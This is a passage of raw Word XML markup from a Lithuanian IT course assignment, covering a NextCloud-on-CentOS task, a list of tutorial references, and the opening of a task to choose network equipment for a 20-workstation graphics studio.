          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3AC4D6CF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir konfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3AC4D6CF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>programų rinkinį Serveris-Klientas NextCloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F6ACC" w14:textId="1A499198" w:rsidR="171451CB" w:rsidRPr="005A5C28" w:rsidRDefault="171451CB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E1F3BA" w14:textId="3537BC59" w:rsidR="7B2DD6E0" w:rsidRPr="005A5C28" w:rsidRDefault="3067AAD6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36A88F" w14:textId="313669CE" w:rsidR="008C5677" w:rsidRPr="005A5C28" w:rsidRDefault="35BF5F7C" w:rsidP="00023552">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shovon</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> S. (</w:t>
      </w:r>
      <w:r w:rsidR="452D1F89" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, Gruodžio </w:t>
      </w:r>
      <w:r w:rsidR="62789D2B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="452D1F89" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> d.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="17A85144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00023552" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00023552" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41ED62AC" w14:textId="0DD78A18" w:rsidR="008C5677" w:rsidRPr="005A5C28" w:rsidRDefault="35BF5F7C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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How to install CentOS 8 with VirtualBox 6.1 on Windows 10. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vitux.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://vitux.com/install-centos-with-virtualbox-on-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="703ED75F" w14:textId="53F75CB6" w:rsidR="000A5D8A" w:rsidRPr="005A5C28" w:rsidRDefault="16A5B0F1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Guoan</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> X. (</w:t>
      </w:r>
      <w:r w:rsidR="07FA9515" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="086EB839" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="07FA9515" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, gruodžio 6). </w:t>
      </w:r>
      <w:r w:rsidR="3C3B70EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Install NextCloud on CentOS 8/RHEL 8 with Nginx (LEMP Stack). </w:t>
      </w:r>
      <w:r w:rsidR="3C3B70EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>LinuxBabe.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="3C3B70EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FA3E1C5" w14:textId="337CF8F8" w:rsidR="000A5D8A" w:rsidRPr="005A5C28" w:rsidRDefault="06A8A919" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Muite</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> B. (</w:t>
      </w:r>
      <w:r w:rsidR="519DADF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2020, lapkričio 6).</w:t>
      </w:r>
      <w:r w:rsidR="5A5E412E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="519DADF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install Nextcloud on CentOS 8. </w:t>
      </w:r>
      <w:r w:rsidR="45912C20" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UpCloud.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="45912C20" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CA6B4" w14:textId="3CB77F70" w:rsidR="00023552" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="00023552">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00A57E70" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:kern w:val="36"/>
            <w:sz w:val="22"/>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C6808C0" w14:textId="77777777" w:rsidR="00023552" w:rsidRPr="005A5C28" w:rsidRDefault="00023552" w:rsidP="00023552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07547A01" w14:textId="6F395838" w:rsidR="000A5D8A" w:rsidRPr="005A5C28" w:rsidRDefault="000A5D8A" w:rsidP="00023552">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F727D57" w14:textId="19C64A44" w:rsidR="000A5D8A" w:rsidRPr="005A5C28" w:rsidRDefault="4FC8F35E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk60949318"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAGAL POREIKĮ</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="17724468" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARINKTI IFORMACINĖS SISTEMOS ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="17724468" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="6A1DD8D4" w14:textId="5D24CE18" w:rsidR="000A5D8A" w:rsidRPr="005A5C28" w:rsidRDefault="17724468" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uriama</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nauja</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">įmonė, kurioje </w:t>
      </w:r>
      <w:r w:rsidR="00D62526" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20 darbo vietų (kompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="5D905377" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nių sistemų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">). Įmonė </w:t>
      </w:r>
      <w:r w:rsidR="0451CBA6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>užsiima</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3D ir 2D kompiuterinės grafikos kūrimu</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5D905377" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bei vaizdo montavimu</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ari</w:t>
      </w:r>
      <w:r w:rsidR="61ABD1C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ite </w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tinkam</w:t>
      </w:r>
      <w:r w:rsidR="5D905377" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tinklo </w:t>
      </w:r>
      <w:r w:rsidR="26F6CE72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įrangą</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (maršrutizatorių, komutatorius, serverį</w:t>
      </w:r>
      <w:r w:rsidR="02B89F3E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="3E904E54" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">bevielio </w:t>
      </w:r>
      <w:r w:rsidR="00BA52E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ryšio </w:t>
      </w:r>
      <w:r w:rsidR="3E904E54" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>prieigos taškus</w:t>
      </w:r>
      <w:r w:rsidR="44026B9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
